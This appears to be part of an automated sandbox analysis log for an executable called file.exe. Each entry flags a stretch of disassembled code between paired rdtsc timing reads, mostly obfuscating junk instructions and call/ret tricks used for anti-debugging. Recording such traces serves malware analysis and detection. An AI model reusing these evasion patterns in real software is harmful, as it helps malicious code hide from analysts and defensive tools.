                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1185D08 second address: 1185D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB60B second address: 11BB61C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB61C second address: 11BB621 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF0CB second address: 11BF0CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF0CF second address: 11BF126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FD908C4C6F0h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007FD908C4C6F1h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push ecx 0x0000001f push edi 0x00000020 push eax 0x00000021 pop eax 0x00000022 pop edi 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD908C4C6F5h 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF24F second address: 11BF2A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FD9092ECB30h 0x00000011 jmp 00007FD9092ECB2Fh 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push ebx 0x0000001a jmp 00007FD9092ECB2Bh 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FD9092ECB38h 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF38F second address: 11BF393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1151 second address: 11C1159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1159 second address: 11C115F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C115F second address: 11C117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FD9092ECB60h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FD9092ECB26h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C117A second address: 11C1195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD908C4C6EEh 0x0000000c jnc 00007FD908C4C6E6h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187767 second address: 1187779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD9092ECB2Dh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3C56 second address: 11C3C5C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3C5C second address: 11C3C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD9092ECB35h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3E0E second address: 11C3E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FD908C4C6E6h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3E1D second address: 11C3E38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C43C6 second address: 11C43E5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD908C4C6E6h 0x00000008 jmp 00007FD908C4C6F1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C43E5 second address: 11C43EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C453C second address: 11C4558 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FD908C4C6F6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4558 second address: 11C455D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C455D second address: 11C4563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C557D second address: 11C5581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C55F1 second address: 11C55FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FD908C4C6ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C55FE second address: 11C5630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007FD9092ECB38h 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD9092ECB2Dh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C5630 second address: 11C5656 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD908C4C6EDh 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C5656 second address: 11C570A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD9092ECB37h 0x00000008 jmp 00007FD9092ECB2Ah 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FD9092ECB28h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov si, bx 0x0000002e call 00007FD9092ECB29h 0x00000033 jo 00007FD9092ECB3Dh 0x00000039 push ecx 0x0000003a jmp 00007FD9092ECB35h 0x0000003f pop ecx 0x00000040 push eax 0x00000041 jno 00007FD9092ECB3Ah 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b push edx 0x0000004c jmp 00007FD9092ECB30h 0x00000051 pop edx 0x00000052 mov eax, dword ptr [eax] 0x00000054 push eax 0x00000055 push edx 0x00000056 jnl 00007FD9092ECB31h 0x0000005c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C5BF8 second address: 11C5BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C5E8C second address: 11C5E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C672E second address: 11C675D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD908C4C6ECh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD908C4C6F9h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C68A1 second address: 11C68A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C865C second address: 11C86B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FD908C4C6E6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov esi, dword ptr [ebp+122D2EC1h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FD908C4C6E8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FD908C4C6E8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f push ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C86B6 second address: 11C86C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C86C6 second address: 11C86D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD908C4C6E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C86D4 second address: 11C86D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C91EC second address: 11C91FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6EBh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C91FB second address: 11C91FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8F66 second address: 11C8F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C927D second address: 11C9282 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB294 second address: 11CB29B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB29B second address: 11CB2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jg 00007FD9092ECB28h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB2AF second address: 11CB320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 push ecx 0x00000008 clc 0x00000009 pop esi 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FD908C4C6E8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FD908C4C6E8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 pushad 0x00000043 movzx edx, si 0x00000046 jmp 00007FD908C4C6EFh 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jne 00007FD908C4C6ECh 0x00000055 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB320 second address: 11CB326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB326 second address: 11CB32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBC44 second address: 11CBCE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD9092ECB2Bh 0x00000011 jmp 00007FD9092ECB33h 0x00000016 popad 0x00000017 jmp 00007FD9092ECB2Bh 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FD9092ECB28h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 jns 00007FD9092ECB30h 0x0000003e xor dword ptr [ebp+124626EEh], edi 0x00000044 mov edi, ecx 0x00000046 push 00000000h 0x00000048 xor si, FB74h 0x0000004d jg 00007FD9092ECB31h 0x00000053 jg 00007FD9092ECB2Bh 0x00000059 mov esi, 540EBDDCh 0x0000005e push 00000000h 0x00000060 push eax 0x00000061 push ecx 0x00000062 pushad 0x00000063 jmp 00007FD9092ECB2Ah 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A4F second address: 11D0A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBA23 second address: 11CBA30 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBA30 second address: 11CBA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0F45 second address: 11D0FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 pushad 0x00000008 mov ax, cx 0x0000000b jmp 00007FD9092ECB2Ah 0x00000010 popad 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FD9092ECB28h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D1D1Ah] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FD9092ECB28h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jne 00007FD9092ECB2Ch 0x00000058 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBA34 second address: 11CBA46 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD908C4C6E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FD908C4C6E6h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D31E8 second address: 11D31F5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD9092ECB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D33B2 second address: 11D33B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D534D second address: 11D538E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FD9092ECB2Dh 0x0000000b nop 0x0000000c adc ebx, 46112A20h 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+124532B3h], edi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+12452E0Fh], eax 0x00000022 xchg eax, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD9092ECB34h 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D538E second address: 11D5394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D62F0 second address: 11D6305 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD9092ECB2Dh 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D55A1 second address: 11D55A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6305 second address: 11D6309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D55A5 second address: 11D55B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FD908C4C6E6h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D75DE second address: 11D75E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D93AE second address: 11D93B4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D93B4 second address: 11D93BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DC30A second address: 11DC30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DC30E second address: 11DC314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DC314 second address: 11DC319 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD34D second address: 11DD352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DE25C second address: 11DE272 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD908C4C6E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FD908C4C6F0h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF26F second address: 11DF273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA552 second address: 11DA56C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FD908C4C6ECh 0x0000000c jns 00007FD908C4C6E6h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD4B1 second address: 11DD4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E033E second address: 11E0342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E05A8 second address: 11E05AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E05AC second address: 11E05B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E05B0 second address: 11E05B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E05B6 second address: 11E05BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E05BC second address: 11E05C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E35CD second address: 11E35D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5B09 second address: 11E5B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA824 second address: 11EA89F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EFh 0x00000007 jmp 00007FD908C4C6F3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FD908C4C6ECh 0x00000014 jnl 00007FD908C4C6E6h 0x0000001a pushad 0x0000001b jbe 00007FD908C4C6E6h 0x00000021 pushad 0x00000022 popad 0x00000023 push edi 0x00000024 pop edi 0x00000025 jmp 00007FD908C4C6EFh 0x0000002a popad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jnp 00007FD908C4C6E6h 0x00000035 jng 00007FD908C4C6E6h 0x0000003b popad 0x0000003c jnc 00007FD908C4C6FDh 0x00000042 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA89F second address: 11EA8A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAB23 second address: 11EAB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE02B second address: 11EE02F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE02F second address: 11EE047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a js 00007FD908C4C6F8h 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FD908C4C6E6h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE047 second address: 11EE04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE04B second address: 11EE06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD908C4C6F5h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE06C second address: 11EE072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
